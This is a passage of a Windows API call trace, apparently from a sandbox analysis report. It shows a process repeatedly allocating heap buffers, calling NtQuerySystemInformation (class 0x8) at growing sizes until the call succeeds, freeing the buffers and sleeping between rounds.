0xc0000004 [0250.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0250.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0250.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.249] Sleep (dwMilliseconds=0x110) [0250.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0250.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0250.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0250.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0250.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0250.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0250.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0250.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.271] Sleep (dwMilliseconds=0x110) [0250.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0250.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0250.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0250.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0250.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0250.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.297] Sleep (dwMilliseconds=0x110) [0250.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0250.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0250.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0250.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0250.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0250.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0250.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.320] Sleep (dwMilliseconds=0x110) [0250.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0250.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0250.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0250.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0250.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0250.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0250.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.333] Sleep (dwMilliseconds=0x110) [0250.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0250.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0250.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0250.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0250.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.347] Sleep (dwMilliseconds=0x110) [0250.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0250.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0250.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0250.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0250.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0250.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0250.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0250.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.364] Sleep (dwMilliseconds=0x110) [0250.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0250.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0250.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0250.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0250.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0250.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0250.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.379] Sleep (dwMilliseconds=0x110) [0250.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0250.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0250.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0250.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0250.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0250.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0250.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0250.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0250.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.438] Sleep (dwMilliseconds=0x110) [0250.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0250.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0250.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0250.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0250.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0250.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0250.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0250.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0250.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.470] Sleep (dwMilliseconds=0x110) [0250.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0250.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0250.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0250.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0250.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0250.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0250.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0250.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0250.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.488] Sleep (dwMilliseconds=0x110) [0250.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0250.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0250.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0250.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0250.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0250.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0250.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.505] Sleep (dwMilliseconds=0x110) [0250.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0250.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0250.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0250.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0250.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0250.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0250.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0250.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.520] Sleep (dwMilliseconds=0x110) [0250.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0250.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0250.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0250.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0250.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0250.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0250.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0250.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0250.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.536] Sleep (dwMilliseconds=0x110) [0250.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0250.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0250.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0250.550] NtQuerySystemInformation 